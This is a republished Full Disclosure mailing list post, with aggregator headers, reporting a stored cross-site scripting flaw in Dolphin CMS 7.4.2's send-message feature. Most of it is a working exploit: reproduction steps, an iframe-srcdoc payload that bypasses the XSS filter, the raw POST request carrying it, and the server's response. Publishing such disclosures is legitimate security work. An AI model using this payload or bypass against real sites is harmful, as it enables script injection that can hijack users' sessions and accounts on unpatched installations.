Stored XSS via Send Message Functionality - dolphin.prov7.4.2
Dolphin CMS 7.4.2版本中存在存储型XSS漏洞,攻击者可通过发送消息功能注入恶意脚本触发攻击。 2025-3-25 08:24:3 Author: buaq.net(查看原文) 阅读量:0 收藏

Stored XSS via Send Message Functionality - dolphin.prov7.4.2
Dolphin CMS 7.4.2版本中存在存储型XSS漏洞,攻击者可通过发送消息功能注入恶意脚本触发攻击。 2025-3-25 04:10:32 Author: seclists.org(查看原文) 阅读量:4 收藏

fulldisclosure logo

Full Disclosure mailing list archives

From: Andrey Stoykov <mwebsec () gmail com>
Date: Fri, 21 Mar 2025 18:00:27 +0000

# Exploit Title: Stored XSS via Send Message Functionality -
dolphin.prov7.4.2
# Date: 03/2025
# Exploit Author: Andrey Stoykov
# Version: 7.4.2
# Date: 03/2025
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/03/friday-fun-pentest-series-20-stored-xss.html



Stored XSS via Send Message Functionality:

Steps to Reproduce:

1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose";
2. Add "Recipient" and "Subject" with random words
3. Add the below mentioned XSS payload that would bypass the XSS filter in
the message section
4. Intercept the HTTP POST request and add the payload once again, as it
might get filtered (make sure to URL encode the spaces etc)
5. It would trigger once the message has been seen

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>



// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1
HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0)
Gecko/20100101 Firefox/137.0
[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>


// HTTP response

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="
http://192.168.58.170/dolphinCMS/mail.php?mode=compose";>Send</a> another
message or <a href="http://192.168.58.170/dolphinCMS/admin";>view</a>
admin's profile.        </div>
</td></tr></table>
</div>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • Stored XSS via Send Message Functionality - dolphin.prov7.4.2 Andrey Stoykov (Mar 24)

文章来源: https://seclists.org/fulldisclosure/2025/Mar/6
如有侵权请联系:admin#unsafe.sh


文章来源: https://buaq.net/go-305643.html
如有侵权请联系:admin#unsafe.sh